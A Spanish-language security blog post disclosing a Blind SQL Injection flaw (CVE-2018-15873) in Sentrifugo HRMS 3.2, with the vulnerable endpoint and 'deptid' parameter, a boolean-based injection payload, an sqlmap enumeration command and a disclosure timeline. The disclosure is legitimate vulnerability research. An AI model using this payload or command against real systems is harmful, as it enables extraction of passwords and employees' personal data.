Esta entrada tiene como objetivo hacer pública la vulnerabilidad Blind SQL Injection descubierta en el software Sentrifugo HRMS 3.2, la vulnerabilidad ha sido asociada al CVE-2018-15873.

 

Sentrifugo HRMS 3.2 – CVE-2018-15873

Blind SQL Injection

 

Sentrifugo es un software open source que facilita la administración de recursos humanos en las organizaciones. Está repleto de módulos esenciales como evaluación, gestión del tiempo, gestión de licencias, gestión de empleados, análisis, contratación, verificación de antecedentes, servicio técnico y mucho más. Permite a los empleados contribuir de manera efectiva y productiva a los objetivos de la organización.

📅 Vulnerabilidad descubierta por Javier Olmedo el 30/07/2018

💣 Publicada el 26/08/2018

🐛 CVE-2018-15873

🔗 Link del software Sentrifugo HRMS

🐞 Versión vulnerable = 3.2 y posiblemente anteriores

 

Vector de ataque / Criticidad de la explotación

CRITICIDAD – CRÍTICA

A través de las vulnerabilidades Blind SQL Injection, un usuario malintencionado podría leer información de la base de datos que utiliza la aplicación en base a preguntas de verdadero o falso con el objetivo de extraer información sensible o confidencial como contraseñas o datos personales de otros usuarios.

 

Parámetros vulnerables

El parámetro deptid, es vulnerable a Blind SQL Injectión mediante petición POST en el recurso /index.php/servicedeskconf/getemployees/format/html

💉 Payload

bunitid=0&deptid=(SELECT (CASE WHEN (5610=5610) THEN 5610 ELSE 5610*(SELECT 5610 FROM INFORMATION_SCHEMA.PLUGINS) END))&reqfor=2

📷 Captura de pantalla de SQLmap lanzando el comando

sqlmap -r poc.req -p deptid --dbms=MySQL --dbs

 

Prueba de concepto (PoC)

1.  Si añadimos el caracter en el parámetro deptid obtenemos un código 500 (error en la aplicación)

1.1 Petición

1.2 Respuesta

 

2. En cambio, al añadir dos , obtenemos un código 200 OK

2.1 Petición

2.2 Respuesta

 

Timeline

30/07/2018 Descubrimiento

30/07/2018 Informo al desarrollador

02/08/2018 Abro issue en GitHub

25/08/2018 Solicito CVE

25/08/2018 MITRE me asigna el CVE-2018-15873

26/08/2018 Hago pública la vulnerabilidad

 

Referencias

CVE-MITRE – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15873

 

Un saludo a todos!! 👋


Javier Olmedo

Consultor de Ciberseguridad e Investigador de Seguridad de Aplicaciones Web en mi tiempo libre, Técnico en Sistemas Informáticos y Técnico Superior en Desarrollo de Software, apasionado de la [In]Seguridad Informática.

Deja tu comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.